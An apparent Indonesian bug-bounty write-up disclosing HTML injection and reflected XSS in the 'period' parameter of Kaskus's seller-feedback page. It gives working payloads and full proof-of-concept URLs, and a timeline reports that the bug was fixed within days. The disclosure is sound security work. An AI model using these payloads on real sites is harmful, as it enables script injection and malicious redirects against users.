Reflected XSS on www.kaskus.co.id

Setelah saya menemukan bug self xss sebelumnya, pencarian masih berlanjut dan saya mendapat kabar bahwa teman saya menemukan bug yang ketiga di website www.kaskus.co.id ( writeupnya ada di coretan-suhada.com )

Membuat saya ingin mencoba kembali mengingat yang sebelumnya hanya self xss, singkat cerita saya menemukan bug HTML injection dan Reflected XSS pada halaman feedback jual beli

Proof of Concept:

1. Buka salah satu profile user lalu menuju halaman feedback jual beli user tersebut.

URL: https://www.kaskus.co.id/profile/feedback/489814/

2. Di halaman feedback dapat disortir menurut periode, kita coba memilih salah satunya.

URL: https://www.kaskus.co.id/profile/feedback/489814/?type=&period=12

3. Pada parameter period kita bisa menginjeksikan kode HTML maupun payload XSS.

Payload HTML Injection: “></a><a href=”https://techpoci.web.id“>asede</a>

Payload XSS: ” accesskey=”X” onclick=alert(location.host) zerobyteid=

4. Ketika parameter period diinjeksikan payload HTML Injection di atas maka kategori semua akan berubah menjadi asede”>Semua dan jika user mencoba klik akan teredirect ke url yang dituju.

URL: https://www.kaskus.co.id/profile/feedback/489814/?type=&period=12"></a><a href="https://techpoci.web.id">asede</a>

html inject kaskus

5. Kemudian ketika parameter period diinjeksikan payload XSS maka payload tersebut akan tereksekusi saat user mencoba klik kembali periode tersebut.

URL: https://www.kaskus.co.id/profile/feedback/489814/?type=&period=12" accesskey="X" onclick=alert(location.host) zerobyteid=

Reflected xss kaskus

Sekian dan semoga bermanfaat, terimakasih 😀

video Proof of Concept:

Timeline:

25 Juni 2019 – Melaporkan bug kepada pihak KASKUS

25 Juni 2019 – Respon CS melaporkan kepada pihak terkait

28 Juni 2019 – Respon CS bug telah diperbaiki

29 Juni 2019 – Meminta data diri untuk pengiriman merchandise

Leave a Reply

Your email address will not be published. Required fields are marked *